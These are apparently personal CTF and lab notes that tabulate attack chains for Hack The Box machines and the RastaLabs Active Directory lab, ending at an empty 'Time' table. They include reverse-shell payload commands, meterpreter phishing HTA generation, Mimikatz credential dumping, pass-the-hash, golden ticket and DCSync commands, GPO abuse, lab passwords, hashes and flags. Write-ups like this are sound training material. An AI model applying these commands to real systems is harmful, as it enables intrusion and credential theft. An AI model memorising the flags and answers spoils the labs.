
Network Scenarios

Network#1

LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts

Network#2

Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket

Network#3

always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service

Network#4

Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DCSync Attack

# Network#5

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Enumeration | Online search for lab IP range | N/A |
| 2 | Enumeration | Port scanning with masscan | `masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0` |
| 3 | Enumeration | Detailed host scanning with nmap | `nmap` (specific commands not provided) |
| 4 | Enumeration | Finding domain names with crackmapexec | `crackmapexec` (specific commands not provided) |

Reel

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.210` |
| 2 | Enumeration | Gobuster directory scanning | `gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50` |
| 3 | Credential Harvesting | Gathering usernames | Gather usernames manually and create a `user.txt` file |
| 4 | Credential Harvesting | Password spraying | `python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01` |
| 5 | Phishing | Sending phishing emails | Use Outlook to send phishing emails and capture the NTLMv2 hash with Responder |
| 6 | Hash Cracking | Cracking NTLMv2 hash | `hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force` |
| 7 | Access | PowerShell remote session | `$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson` |
| 8 | Privilege Escalation | Creating a junction (symlink) | `New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'` |
| 9 | Privilege Escalation | Using Check-File command | `Check-File C:\programdata\root\Desktop\root.txt` |
| 10 | Exfiltration | Transferring files with nc.exe | `iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'` |

Jewel

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.211` |
| 2 | Web Enumeration | Checking server with Wappalyzer | Use Wappalyzer to identify backend technologies |
| 3 | Web Enumeration | Analyzing .git directory | Check the `Gemfile` in the `.git` directory for Ruby and Gem versions |
| 4 | Exploitation | Exploiting Ruby on Rails | Use a Ruby on Rails exploit |
| 5 | Post-Exploitation | Capturing request in Burp | Capture the request and modify it with the exploit |
| 6 | Post-Exploitation | Getting a reverse shell | Use a netcat listener and send the exploit to get a reverse shell |
| 7 | Privilege Escalation | Cracking password hashes | Use John the Ripper to crack the password hashes found in `/var/backups` |
| 8 | Privilege Escalation | Using .google_authenticator file | Use the contents of `.google_authenticator` to bypass two-factor authentication |
| 9 | Privilege Escalation | Synchronizing time for successful exploit | Adjust the system time to match the timezone for the exploit to work |
| 10 | Privilege Escalation | Gaining root access with GTFOBins | `sudo gem open -e "/bin/sh -c /bin/sh" rdoc` to gain root access |

Atom

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Recon | Nmap scanning | `nmap -sV -sC -oN nmap 10.10.10.237` |
| 2 | File Analysis | Analyzing executable file | `file heedv1\ Setup\ 1.0.0.exe` |
| 3 | SMB Enumeration | Enumerating SMB shares | `smbclient -L \\10.10.10.237` |
| 4 | SMB File Transfer | Transferring files via SMB | `smbclient \\\\10.10.10.237\\Software_Updates`, then `get UAT_Testing_Procedures.pdf` |
| 5 | Exploitation | Crafting malicious binary | `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"` |
| 6 | YML File Creation | Creating a .yml file for the exploit | Manual creation of a `latest.yml` file |
| 7 | SMB File Transfer | Uploading .yml file via SMB | `smbclient \\\\10.10.10.237\\Software_Updates`, then `put latest.yml` |
| 8 | Reverse Shell | Obtaining a reverse shell | Use Metasploit to listen for the reverse shell |
| 9 | Redis Exploitation | Exploiting Redis | `redis-cli -h 10.10.10.237`, then `get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0` |
| 10 | Password Decryption | Decrypting password | `python3 decrypt.py` with the script provided in the summary |

Network1

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Data Analysis | Reading pcap file | Use NetworkMiner to read the `.dmp` file and extract the secret file |
| 2 | Cryptography | Decoding the flag | Use the `filecryptography.psm1` PowerShell module |
| 3 | File Preparation | Preparing files for decryption | Rename the secret file to `secret.txt.AES` on ws04 |
| 4 | Key Conversion | Converting key for decryption | `$key = Get-Content key.txt` |
| 5 | File Decryption | Decrypting the file | `Unprotect-File '.\secret.txt.AES' -Algorithm AES -Key $key` |
| 6 | Flag Retrieval | Retrieving the flag | The flag is RASTA{cryp70_3xf1l7r4710n} |

Network2

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Credential Dumping | Enumerating credentials on WS02 | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force` |
| 2 | Credential Dumping | Using Mimikatz to dump creds | Upload `mimikatz.exe` and execute `sekurlsa::dpapi` to get the master key |
| 3 | Credential Decryption | Decrypting credentials | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...` |
| 4 | Port Forwarding | Setting up port forwarding | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389` |
| 5 | RDP Connection | Connecting via RDP with Remmina | Install Remmina, import `sql01.rdp`, change the host, export to an `.rdp` file |
| 6 | RDP Connection | Using xfreerdp to connect | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local` |
| 7 | Flag Retrieval | Retrieving the flag | The flag is RASTA{c00k1n6_w17h_645_n0w} |

Network3

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Credential Enumeration | Finding LAPS group members | Enumeration shows that `ngodfrey_adm` is a member of the LAPS group on WS05 |
| 2 | Credential Access | Dumping credentials with PowerSploit | `powershell -ep bypass`, then `Import-Module ./PowerSploit.psd1` |
| 3 | Credential Access | Using credentials for access | `$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force`, then `$cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\ngodfrey_adm', $SecPassword)` |
| 4 | Credential Access | Getting AD object with credentials | `Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred` |
| 5 | Local Admin Passwords | Retrieving local admin passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 |
| 6 | Port Forwarding | Setting up port forwarding with Meterpreter | `portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445`, and similar for the other ports |
| 7 | Exploitation | Using MS17-010 exploit for admin shell | `exploit/windows/smb/ms17_010_psexec` with `lport` 80, 443, 8080 |
| 8 | Flag Retrieval | Retrieving flags from WS02 and WS04 | Flags are RASTA{3v3ryb0dy_l0v35_l4p5}, RASTA{wh3r3_w45_2f4_!?}, RASTA{50m371m35_y0u_mu57_b4ck7r4ck} |
| 9 | Post-Exploitation | Running Mimikatz on WS02 | `privilege::debug`, then `sekurlsa::logonPasswords` |
| 10 | File Permissions | Modifying file permissions for flag | `icacls flag.txt /grant administrator:F` or `icacls flag.txt /grant RLAB\ahope:F` |

Network4

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Privilege Escalation | AS-REP Roasting | `Import-Module ./asreproast.ps1`, then `Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1`, then `Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 \| select -expand hash` |
| 2 | Hash Extraction | Saving Hash | Copy the hash to a `.txt` file and save it with UTF-8 encoding |
| 3 | Wordlist Creation | Using kwprocessor | `./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt` |
| 4 | Password Cracking | Using John the Ripper | Use John the Ripper (jumbo version) to crack the hash |
| 5 | Credential Use | Mounting the home share | `net use H: \\fs01.rastalabs.local\home$\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"` |
| 6 | Flag Retrieval | Accessing Flag | The flag is RASTA{k3rb3r05_15_7r1cky} |

Network5

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Enumeration | Viewing shares on fs01 | `net view \\fs01 /all` |
| 2 | Enumeration | Using PowerSploit for enumeration | `powershell -ep bypass`, then `Import-Module ./PowerSploit.psd1`, then `Get-NetShare \\fs01` |
| 3 | Flag Retrieval | Accessing open shares | Flag is RASTA{ju1cy_1nf0_1n_0p3n_5h4r35} |

Network6

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Phishing | Creating phishing HTA | `python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta` |
| 2 | Web Server Setup | Hosting HTA on Apache2 | Copy `index.html` and `launcher.hta` to `/var/www/html`, then `service apache2 start` |
| 3 | Listener Setup | Setting up Metasploit listener | `msfconsole -r unicorn.rc` |
| 4 | Share Enumeration | Viewing shares on the network | `net share`, `net view`, `net use K: \\hostname\share$`, `net view \\hostname /all` |
| 5 | User Enumeration | Displaying domain user accounts | `net user /domain` |
| 6 | User Information | Viewing user info | `net user [username] /domain` |
| 7 | Group Enumeration | Viewing domain group members | `net group finance /domain` |
| 8 | Drive Enumeration | Listing logical drives | `fsutil fsinfo drives`, `wmic logicaldisk get name`, `diskpart` then `list volume` |
| 9 | Network Recon | Pinging servers for IP addresses | `ping DC01`, `ping FS01`, `ping MX01`, `ping NIX01`, `ping SQL01`, `ping WS01`, `ping WS02`, `ping WS03`, `ping WS05` |
| 10 | Flag Retrieval | Accessing the flag | Flag is RASTA{w007_f007h0ld_l375_pwn} |
| 11 | KeePass Database | Found KeePass database and key file | Located in `M:\Documents` |

Network7

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | User Enumeration | Finding user directory on fs01 | `net user ahope /domain` |
| 2 | Network Drive Mount | Mounting network drive to access file | `net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"` |
| 3 | File Conversion | Converting .ppk to OpenSSH format | `puttygen nix01.ppk -O private-openssh -o nix` |
| 4 | Network Configuration | Adding route and running proxy server | Commands for adding the route and running the socks4a proxy server on ws01 are not provided in the summary |
| 5 | SSH Connection | Connecting via SSH with proxychains | `proxychains ssh -i nix [email protected]` |
| 6 | Privilege Escalation | Using exploit for privilege escalation | Compile the exploit with `gcc exp1.c -o exploit` |
| 7 | File Transfer | Transferring exploit to target | `proxychains scp -i nix -r exploit [email protected]:/home/ahope` |
| 8 | File Download | Downloading file from remote to local | `proxychains scp -i nix [email protected]:/usr/local/sbin/paycalc /root/Desktop/rasta` |
| 9 | Flag Retrieval | Retrieving the flag | Flag is RASTA{y0ur3_4_b4ll3r_70_637_7h15} |

Network8

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Port Forwarding | Forwarding port to ws01 | `portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445` |
| 2 | Remote Execution | Using Metasploit psexec for shell | Use msf psexec to get a shell on ws01 |
| 3 | Remote Execution | Using Impacket psexec for shell | Use Impacket psexec to get a shell on ws01; add the route in meterpreter |
| 4 | Proxy Configuration | Setting SOCKS4a proxy in Metasploit | Set the socks4a proxy in msf, then edit `/etc/proxychains.conf` |
| 5 | Enumeration | Using CrackMapExec to enumerate | `proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi` |
| 6 | Hash Dumping | Dumping hashes | Dump hashes with CrackMapExec and proxychains |
| 7 | Credential Access | Accessing vault with Mimikatz | Use Mimikatz on ws01 to access vault credentials |
| 8 | Credential Decryption | Decrypting credentials | `dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>` |
| 9 | Impersonation | Impersonating user with Incognito | In meterpreter, load incognito and impersonate rweston |
| 10 | Clipboard Monitoring | Monitoring clipboard for credentials | Transfer the shell to Empire and monitor the clipboard |
| 11 | RDP Connection | Connecting via RDP with credentials | `xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10` |
| 12 | Flag Retrieval | Retrieving the flag | Flag is RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5} |

Network9

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Port Forwarding | Forwarding port to ws05 | `portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445` |
| 2 | Credential Use | Using rweston_da hash | rweston_da hash: `ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa` |
| 3 | Exploitation | Exploit via smb/psexec | Use the hash with smb/psexec to exploit |
| 4 | Flag Retrieval | Retrieving the flag | Flag is RASTA{53rv1c3_4bu53_f7w} |

Network10

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Credential Use | Using epugh_adm credentials | Log in to web01 (10.10.110.10), then RDP to sql01 (10.10.122.15) using the epugh_adm creds |
| 2 | Lateral Movement | RDP to fs01 with gopikrishna | RDP to fs01 with user gopikrishna (local admin) |
| 3 | Malware Execution | Running p0wnedshell.exe | Run `p0wnedshell.exe` from an admin cmd |
| 4 | Credential Dumping | Invoke Mimikatz from p0wnedshell | Use option 4 in p0wnedshell, invoke Mimikatz to get the rweston_da NTLM hash |
| 5 | Credential Use | Pass-the-hash with Mimikatz | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa` |
| 6 | Golden Ticket Attack | Perform DCSync to get krbtgt hash | Use option 10 in p0wnedshell, perform DCSync |
| 7 | Golden Ticket Attack | Generate golden ticket | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` |
| 8 | Golden Ticket Attack | Use golden ticket | `kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` |
| 9 | Flag Retrieval | Accessing the flag | `pushd \\dc01.rastalabs.local\C$`; flag is RASTA{r4574l4b5_ch4mp10n} |

Network11

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Initial Access | Using epugh_adm credentials | Log in to web01 (10.10.110.10) |
| 2 | Lateral Movement | RDP to sql01 with epugh_adm creds | Take RDP of sql01 (10.10.122.15) using the epugh_adm credentials |
| 3 | Database Access | Start SQL Management Studio | Start SQL Management Studio and connect via Windows authentication |
| 4 | Database Querying | Querying SQL database | `use umbraco; SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'` |
| 5 | Flag Retrieval | Retrieving the flag from database | `select * from Flag`; flag is RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6} |

Network12

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Credential Use | Logging in with epugh_adm credentials | `mstsc /v:web01 /u:epugh_adm /p:[password]` |
| 2 | Lateral Movement | RDP to sql01 using epugh_adm | `mstsc /v:sql01 /u:epugh_adm /p:[password]` |
| 3 | GPO Enumeration | Enumerating GPO permissions | `Get-NetGPO` |
| 4 | Group Membership | Checking group members | `net user epugh_adm /domain` |
| 5 | GPO Permission | Finding GPO with weak permissions | `Get-NetGPO -ComputerName fs01.rastalabs.local` |
| 6 | OU Enumeration | Finding host with specific policy | `Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"` |
| 7 | Policy Enumeration | Identifying applied policy | `Get-NetGPO -ComputerName fs01.rastalabs.local` |
| 8 | GPO Abuse | Creating and applying immediate tasks | `New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force`, then `New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force` |
| 9 | File Permissions | Modifying permissions for flag.txt | `icacls flag.txt /grant administrators:F` |
| 10 | Flag Retrieval | Retrieving the flag | Flag is RASTA{6p0_4bu53_15_h4rdc0r3} |

SneakyMailer

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Initial Recon | Nmap scan | `nmap -sC -sV 10.10.10.197` |
| 2 | DNS Enumeration | Brute-force subdomains | `ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185` |
| 3 | Email Gathering | Extract emails | Extract emails from `http://sneakycorp.htb/team.php` to `mails.txt` |
| 4 | Phishing | Send phishing emails | Use swaks to send emails to the addresses in `mails.txt` |
| 5 | Credential Harvesting | Decode credentials | Use Burp Suite to decode credentials from the intercepted traffic |
| 6 | Email Client Setup | Configure email client | Set up Evolution with the SMTP server and the `[email protected]` credentials |
| 7 | FTP Access | Access FTP | `ftp 10.10.10.197` with the credentials obtained |
| 8 | Reverse Shell | Upload and trigger reverse shell | Upload `rev.php` via FTP and trigger it with curl |
| 9 | Privilege Escalation | Add SSH key to authorized keys | Add the generated SSH key to `/home/low/.ssh/authorized_keys` via a malicious package |
| 10 | Sudo Exploitation | Exploit sudo permissions | Use `sudo /usr/bin/pip3` to execute a malicious package with a reverse shell |

Mango

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Port Scanning | Masscan and Nmap | `masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0`, then `nmap [options] [target]` |
| 2 | Web Enumeration | Checking web ports | Access the web service on ports 80 and 443 |
| 3 | SSL Certificate | Viewing certificate | View the SSL certificate details |
| 4 | Host File Editing | Adding VHOST to hosts file | Edit `/etc/hosts` to add `staging-order.mango.htb` |
| 5 | NoSQL Injection | Bypassing login | Use Burp Suite to intercept and modify the request for NoSQL injection |
| 6 | Data Extraction | Automating credential extraction | Run a Python script to extract credentials for the admin and mango users |
| 7 | SSH Connection | Accessing SSH | SSH into the server using the extracted credentials |
| 8 | User Flag Access | Retrieving user flag | Use `su` to log in as admin and retrieve the user flag |
| 9 | Privilege Escalation | Exploiting SUID file | Use the SUID file to read the root flag or exploit it for root access |
| 10 | Root Flag Access | Reading root flag | Run the binary or use `jjs` to read the root flag |

Time

| ID | Stage | Techniques | Commands |
| --- | --- | --- | --- |
| 1 | Reconnaissance | | |